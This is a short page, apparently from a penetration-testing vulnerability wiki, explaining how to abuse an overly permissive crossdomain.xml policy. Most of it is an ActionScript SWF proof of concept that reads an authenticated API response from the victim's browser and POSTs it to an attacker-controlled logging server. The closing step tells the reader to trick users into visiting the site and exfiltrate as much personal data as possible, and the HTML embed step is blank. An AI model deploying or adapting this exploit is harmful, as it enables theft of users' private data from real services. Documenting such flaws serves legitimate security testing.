Cobalt Vulnerability Wiki

• Checkout crossdomain.xml endpoint
• Register one of the domain in the list
• Adjust and compile the following SWF file

package { import flash.display.Sprite; import flash.events.*; import flash.net.URLRequestMethod; import flash.net.URLRequest; import flash.net.URLLoader; public class poc extends Sprite { public function poc() { // Target URL from where the data is to be retrieved var readFrom:String = “anyclientAPIendpointreturningsensitivedata"; var readRequest:URLRequest = new URLRequest(readFrom); var getLoader:URLLoader = new URLLoader(); getLoader.addEventListener(Event.COMPLETE, eventHandler); try { getLoader.load(readRequest); } catch (error:Error) { trace(“Error loading URL: “ + error); } } private function eventHandler(event:Event):void { // URL to which retrieved data is to be sent var sendTo:String = “addaloggingserverheretostorethedata" var sendRequest:URLRequest = new URLRequest(sendTo); sendRequest.method = URLRequestMethod.POST; var body:String = escape(event.target.data); sendRequest.data = body; var sendLoader:URLLoader = new URLLoader(); try { sendLoader.load(sendRequest); } catch (error:Error) { trace(“Error loading URL: “ + error); } } } }

• Call it like this in a HTML file on the new bought domain

• Trick users into visiting your site and exfiltrate as much personally identifiable information as possible.